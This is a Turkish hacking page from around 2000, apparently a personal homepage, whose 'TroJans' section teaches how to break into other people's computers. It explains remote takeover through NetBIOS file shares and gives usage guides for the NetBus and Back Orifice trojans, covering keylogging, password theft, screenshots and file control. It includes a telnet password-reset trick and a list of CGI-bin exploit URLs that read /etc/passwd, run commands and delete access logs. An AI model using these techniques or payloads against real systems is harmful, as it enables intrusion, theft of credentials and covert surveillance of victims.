About this Site
Create your own website today!
Update your website
Vote for this Site
Visit My Chat Room
Popular Popups
Jukebox
Message Board
Classified Ads
Statistics
Refer This Site
To A Friend
Home

CepMelodileri
BookMarLarIm
About Me
DostLaRIm
Download
OKUpls
QuakeIIIArena
ChangeYourBar
Mp3
NetZip
NukeNabber
WinZip80
iCQ99b
SubSeVen21
v2000
winamp
Go_TherE
DigerSitem
LooK .!.!.!
Bilgi1
Bilgi2
TroJans
PushTheVote
Musix
MetallicA
WeB
HackSayfalaRI
KomikSayfaLar
AganigiNaganigi
AramaMotoru
DowloadSayfalaRI
iNterNeT
internettenParaKazanmaK
icQ
iCqHakkinda
icqSIRLARI




-TroJans -


  NEW! Poetry and Doll Maker with Galleries!     [Learn About Our Ecommerce]
Graphics Gallery!

Nbtstat Ile Karsi Pc yi Trojansiz Elegecirmek
Dos komut satirinda nbtstat -A komutunu veriyoruz. Basarili Olmussak:
NetBIOS Remote Machine Name Table
Name Type Status
^M0REBID <00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC Address = 44-45-53-54-00-00
gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir. Bizim icin önemli olan da bu.
c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz. ("Edit lmhosts" komutuyla) Eger ki daha önceden lmhosts dosyasi varsa bile yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi, ^MOREBID bilgisayarin adi)
d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina eklediklerimizi networkumuze tanitiyoruz.
e- Simdi Windows'a dönme zamani. Baslat/Bul/Bilgisayarlar menusunden UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler yaptiktan sonra bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift tiklayip harddiskini görebiliyoruz.
Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik olmasi durumunda calisir.
Netbus Pc sistemlerine girmemizi saglayan bir program. Backorrifice ve master paradiese kadar çok islevi olmasa bile basitligi ile oldukça basarili. Programin server dosyasinin karsi pc de açildikdan sonra pc ye girebilirsiniz. Ama netbus artik çok duyuldu ve server dosyasi (patch.exe) yi artil herkes icon undan yada boyutundan taniyor bu yuzden isiniz oldukça zor ilerde netbus un server dosyasini diger dosyalara bulastirmayi da anlatacagim.
Simdi indirmis oldugunuz netbus paketindeki dosyalari taniyalim
Netbus.exe : Bizim pc ye saldirmak için kullanacagimiz yazilim.
Patch.exe : Karsi pc ye yollanmasi gereken server programi
Host : Listemize kaydetmis oldugumuz, eklemis oldugumuz ip numaralari bu dosyanin içine yazilir. Ilk aldigiunizda bu dosya olmayacakdir sonradan olusur.
Temp.jpg: Karsi pc nin o anki goruntusunu screendump yaparak cekmis oldugumuz resimler ilk olarak boyle kaydedilir. Eger bi sefer yaptikdan sonra dosyanin yedegini almazsaniz bi sornaki goruntude onun uzerine yazilir.
Netbusdaki komutlar ve gorevleri
Open Cdrom: Cdrom u açar,kapatir
Show image: Resim dosyalarini gösterir
Swap Mouse: Mouse cursor unu gostermez-geri açar
Start Program: Karsi pcdeki bi programi çalistitir.
Msg Manager: Mesaj Yollarsiniz. (hata mesajlari)
Screendump: O anki karsi pc nin ekran goruntusunu jpg olarak pcnize atar.
Get Info: Patch in nerde oldugu ve karsi pc de kaç kisinin daha oldugunu gösterir.
Port Redirect: Port u degistirir.
Play Sound: Ses dosyasi çalistirir.
Exit Windows: Windows'u kapatir-Reset attirir-Askiya alir.
Send Text: Mesaj yollamanizi saglar
Active Winds: O anki aktif programlari gosterir.
Mouse pos: Mouse elegecirir..
Listen: Karsidakinin ne yazdigini gösterir
Sound System: Karsi pcnin ses ayarlari ile hasir nesir olabilmek için.
Server Setup: Ayar olayi.
Control Mouse: Mousu ele geçirir.
Go to Url: Sizin istediginiz urlye yollar karsidakini
Key Manager: Klavyeyi kitler-açar
File Manager: Dosya yollamak,almak için
Sifreli Netbus Kullanicilarina Nasil Girebilirim?
2 Yöntem var bunlardan birincisi cok basit ikincisi birazdaha uzmanlik istiyor.
1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli program ile bunu yapmak çok kolay ustdeki bolume kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz sonra assagi tarafa yeni sifreyi yazip giriyoruz.
2.)Yöntem Telnetle:
Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.
Sisreyi Sikmek için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreyedephiberoptik yaziyoruz...
-------
BACKORIFICE NEDIR?
KARSI PCLERE SALDIRMAK IÇIN YAPILMIS BIR PROGRAM. PROGRAM HEM COK BASIT KULLANIMI BUNUN YANINDA ÇOK ISLEVLI OLMASI EN BÜYÜK ÖZELLIGI. BACKORIFICE SAYESINDE KARSI PC NIN INTERNET SIFRESINDEN.... EKRAN KORUYUCU SIFRESINE KADAR BIR ÇOK SIFRESINI ÇALABILIRSINIZ. PC YE RESET ATABILIR.DOSYALARI ÜZERINDE ISTEDIGINIZ DEGISIKLIGI YAPABILIRSINIZ...
BACKORIFICE DOSYALARINI TANIYALIM ;
BOSERVE.EXE: SERVER PROGRAMI. YANI KARSI PC YE YOLLAMAMIZ GEREKEN DOSYA.
BOGUI.EXE: KENDI KULLANACAGIMIZ DOSYA.
BOCILIENT.EXE: PROGRAMIN DOS VERSIYONU (BEN BUNU TAVSIYE EDERIM)
BOCONFIG.EXE: PROGRAMIN AYARLARININ YAPILDIGI DOSYA
NASIL BAGLANACAGIM?
KARSI PC YE SERVER DOSYASINI AÇTIRDIKDAN SONRA COMMAND BOLUMUNDEN PING HOST 'I SEÇIYORUZ VE SEND E TIKLIYORUZ. BAGLANDIGIMIZA DAIR BISEYLER GELIRSE (MERAK ETMEYIN EGER BAGLANIRSANIZ MUTLAKA ANLARSINIZ UNLEMLI 3-4 SATIR BI YAZI CIKAR) KISININ PC SINDEYIZ DEMEKTIR NELER MI YAPABILIRIZ?
DIRECTORY LIST: KLASÖRLERI LISTELER UNUSED (SOLDAKI) BOLUME YOLU YAZIYORUZ.
DIRECTORY CREATE: KLASÖR OLUSTURUR. UNUSED (SOLDAKI) BÖLÜMÜNE OLUSTURULACAK KLASORU YAZIN.
DIRECTORY REMOVE: KLASÖR SILER. UNUSED (SOLDAKI) YOLU YAZIN.
FILE COPY: DOSYA KOPYALAMAK IÇIN UNUSED (SOLDAKI) 'E KAYNAK DOSYAYI. UNUSED(SAGDAKI) 'E HEDEF DOSYAYI YAZIN.
FILE DELETE: DOSYA SILMEK IÇIN. UNUSED (SOLDAKI) DOSYA ADINI YAZIN.
FILE FIND: DOSYA BULMAK IÇIN.
KEYLOG BEGIN: KAYIT DOSYASI. UNUSED (SOLDAKI) 'E DOSYANIN ADINI YAZIN.
MM PLAY SOUND: WAV DOSYALARINI CALILTIRMAK IÇIN. UNUSED (SOLDAKI) DOSYANIN ADI VE YOLUNU YAZIN.
SYETEM DIALOG BOX: MESAJ IÇIN. UNUSED (SOLDAKI)'E MESAJINIZI UNUSED (SAGDAKI) MESAJ KUTUSUNUN BASLIGINI YAZIN.
SYSTEM INFO: PC NIN SISTEMI HAKKINDA BILGI VERIR.
SYSTEM REBOOT: RESET ATTIRIR
TCP FILE RECIEVE: DOSYA INDIRMEK IÇIN. UNUSED (SOL) A DOSYA ADI UNUSED (SAG) HEDEF DOSYA : PORT
PCP FILE SEND: DOSYA YOLLAMAK IÇIN. UNUSED (SOL) A DOSYA ADI UNUSED (SAG) HEDEF DOSYA : PORT
BO CLIENT
BUNLARIN DISINDA BOCLIENT.EXE ADLI DOSYA ILE DE BAGLANABILIRIZ
DOSYAYI CALISTIRDIKDAN SONRA HOST XXX.XXX.XXX.XXX (KARSI PC NIN IP NUMUNU YAZIN) SONRA O PC YE BILDIGINIZ MS-DOS KOMUTLARI ILE YÖNETEBILIRSINIZ YALNIZCA DIKKAT ETMENIZ GEREKEN BI NOKTA VAR. BI ISLEM, YAPACAGINIZ ZAMAN TAM YOL VERMELISINIZ. MESELA DIZIN DEGISTIRECEKSINIZ CD ELMA YERINE CD C:\ELMA KOMUTUNU KULLANMALISINIZ.
SIMDILIK BACKORRIFCE BÖLUMU BU KADAR AMA ILERDE PLUG IN LERINIDE TANITACAGIM GELISMELERI IZLEYIN.
CGI-BIN GUVENLIK ACIKLARINI KULLANARAK BI SITEYI HACKLEMEK
A- (PHF SCRIPTI): PEK COK WEB ANA BILGISAYARI CGI-BIN GUVENLIÐINDEN
YOKSUNDUR. BIR DE BUNUN UZERINE SISTEM YÖNETICILERININ CGI-BIN GUVENLIK
ACIKLARINI BILMEMESI POTANSIYEL SISTEM ACIKLARINA YOL ACMAKTADIR. TUM
DUNYADA PEK COK HACKER'IN KULLANDIÐI CGI-BIN GUVENLIK ACIÐI:
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0ACAT%20/ETC/PASSWD
FAKAT BAZI UYANIK SISTEM YÖNETICILERI PHF KOMUTUNUN KULLANIMINI
SINIRLAMISLARDIR. BU YUZDEN BU KOMUTU CALISTIRAMAYABILIRSINIZ. FAKAT YINE
DE ALTERNATIF WEB MAKINALARI UZERINDE DENEMEKTE YARAR VAR.
B- (WRAP SCRIPTI): IRIX ISLETIM SISTEMININ 6.2 VERSIYONUNDA RASTLANAN BU
HATAYI DA SÖYLE ISTISMAR EDEBILIRIZ:
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/WRAP?../../../ETC/PASSWD
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/WRAP?%0ALS (...)
DIKKAT EDECEÐIMIZ TEK NOKTA BU HATA SADECE IRIX 6.2'DE VAR. !!
C- (VIEW SOURCE SCRIPTI): DENEMEK SERBEST (BASARIYA ULASABILME
IHTIMALI KADAR ULASAMAMA IHTIMALI DE VAR)
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/VIEW-SOURCE?../../../ETC/PASSWD
YA DA
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/VIEW-SOURCE?%1B OR
%0A %20
D- (PHP.CGI SCRIPTI):
HTTP://WWW.VICTIM.COM/CGI-BIN/PHP.CGI?../../../ETC/PASSWD
E- DIÐER DENENEBILIR SCRIPTLER:
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0APING%20-C%201000%20-S
%205000%20IP%20TO%20SHOOT
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0ACP%20PHF%20FHP
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0ACP%20PHF%20.BLAH
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0ALS%20-AL%20/DIR/TO/GO
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0AMKDIR%20/WWW/DIRTOCREATE
HTTP://WWW.KIRACAÐ;IMIZADRES.COM.TR/CGI-BIN/PHF?QNAME=A%0ARM%20../LOGS/ACCESS_LOG







Sign Guestbook

View Guestbook

weBMater = Einstein
k§K

userneo9149@icqmail.com

Domain Lookup
         www..
Get www.yourdomainofchoice.com for your site with services!




.

 
Any WordAll WordsExact Phrase
This SiteAll Sites
Visitors: 00457
Page Updated Sun Feb 13, 2000 1:39pm EST